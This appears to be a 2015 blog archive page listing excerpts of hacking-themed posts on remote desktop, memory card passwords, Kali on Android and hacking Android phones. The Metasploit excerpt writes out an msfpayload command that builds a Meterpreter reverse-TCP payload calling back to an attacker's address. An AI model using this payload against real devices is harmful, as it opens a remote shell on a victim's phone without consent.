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Showing posts from August, 2015

Control your PC with Android Mobile..

Control Your PC Via Your Android Phone using Google chrome remote desktop-2015 remote access smartphone and computers let you get things done anywhere and everywhere, but portability becomes more bane than blessing when you forget a critical file at home, especially if you're the type of person who dumps files on your desktop rather than a Dropbox i am going to use Google's Chrome Remote Desktop for control your pc with the help of your android device easily.this service, first launched in 2011, is coming to mobile. But now, the company released an Android app that will let users access their desktop computers, whether through a Chrome web app for Mac, PC, and Linux or through Chrome OS itself. Once you've set up your primary machine, you can launch the Android app to connect to it. GigaOm reported a few days ago that the app was in beta testing, but it's now available to anyone with an Android phone or tablet, though doing much with the former will

Hack a memory card password within minutes

possible ways to break micro sd memory card password hye friends today's topic is very importent .some time we secrate the data in memory card with password but unfortunatly we forget that password which protect our dta from hackers or your friends or any other you guess. so i am here to give you best solution of breaking memory card paasword in only 5 minutes. there are lot off methode publish on internate about how to break the memory card password but many of my reader advise me to write a tutorial about breaking memory card password .becuase they believe that i am write that tutorial very friendly so they can understand very ifficiently. so now i am going to start the tutorial namly how to break memory card i am publish very friendly methode break password so i give only those methode which easily understandable for everyone .so dont wasting your valuable time lets start.follow step by step procedure. solution no. 1:-- BREAKING MEMORY CARD PASSWORD FOR

Install Kali Linux on your Android device(rooted device)

how to Install Kali Linux on Andoid Device Easily With Rooted Phone Without Computer 2015    Hello dear readers today i am coming with a great post which is all about how you can easily install Kali Linux hacking tool in your android device without any computer or laptop ,Google's Android Operating System in Mobile phones are still relatively new, however, Android Operating System has been progressing quite rapidly. Conceived as a counterpoint IOS, Android is a graph showing a significant development, it certainly can not be separated from supports major mobile phone manufacturers who participated to bring mobile-phone operating system Android.i am writing this post because similar article on the internet have some error so newbie like you are not able to install the hacker's operating system (Kali) on the android phone.After read this full tutorial you know all about How To Install & Run Kali/Ubuntu/Fedora Linux on Android .for your knowledge purpose i want to write

Hack Android (using Metasploit)

Hacking Android Smartphone Tutorial using Metasploit what  is     your  Requirements: 1. first  you  need Metasploit framework (we use Kali Linux 1.0.6 in this tutorial) 2. obiously you need  a  Android smartphone (we use LG android 4.4 KitKat) Step by Step Hacking Android Smartphone Tutorial using Metasploit: step:1). first  of  all  simply  Open terminal if  you  don't  know  how  simply  press CTRL + ALT + T step:2). After  that  We will utilize Metasploit payload framework to create exploit for this tutorial.      msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> here  we  allready  describe  what  is attacker   IP address  and  here  we  considered  ip  as, if  you  don't  understand  please  see beelow  picture step:3) .This  is   Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incomi